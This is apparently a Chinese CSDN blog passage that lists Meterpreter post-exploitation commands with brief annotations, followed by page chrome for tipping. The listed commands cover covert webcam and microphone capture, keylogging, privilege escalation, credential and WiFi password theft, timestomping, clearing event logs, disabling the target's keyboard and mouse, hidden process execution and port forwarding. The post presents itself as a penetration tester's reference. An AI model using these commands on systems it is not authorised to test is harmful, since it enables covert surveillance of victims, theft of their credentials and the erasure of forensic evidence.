metepreter命令

本文详细介绍了Meterpreter后渗透阶段的各种命令,包括会话管理、文件操作、截图、摄像头控制、权限提升、系统信息获取、网络扫描、注册表操作、后门植入等。此外,还提到了如何利用内核漏洞提权、哈希传递和注册表设置nc后门等高级技巧,是渗透测试人员的重要参考资料。
摘要由CSDN通过智能技术生成

https://xz.aliyun.com/t/2536
meterpreter后渗透命令
background 将会话切换到后台
sessions -l
sessions -i 2 启动一个shell或一个meterpreter
sessions -k 2 杀死shell
upload /root/桌面/payload.txt c:
edit payload.txt
cat ls c: rmdir rm download
screenshot 截屏
webcam_list 列出所以摄像头
webcam_snap 拍照
webcam_stream 录制实时视频
file:///root/bapsdkjf.html 查看视频
record_mic 利用麦克风录制环境声音 -d 设置录制的时间(秒)
idletime 计算空闲时间,在空闲时间内发动攻击
keyscan_start
keyscan_dump
keyscan_stop
getuid
getsystem 提权
timestomp
-v 显示信息
-z 修改时间如timestomp -z “11/23/2020 15:23:34” payload.txt
-b 清除时间信息
run post/windows/wlan/wlan_bss_list 获取附近无线网络
run post/windows/wlan/wlan_profile 或却wifi密码
run get_application_list 获取应用程序列表
run post/windows/gather/credentials/ 获取这种密码
search -f *.txt *.doc 查找文件
clearev 清除所有日志
shell
reboot
sysinfo
ps
kill
getpid
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中

ipconfig/ifconfig
netstat –ano
arp
getproxy #查看代理信息
route #查看路由

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

run autoroute –h #查看帮助
r

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值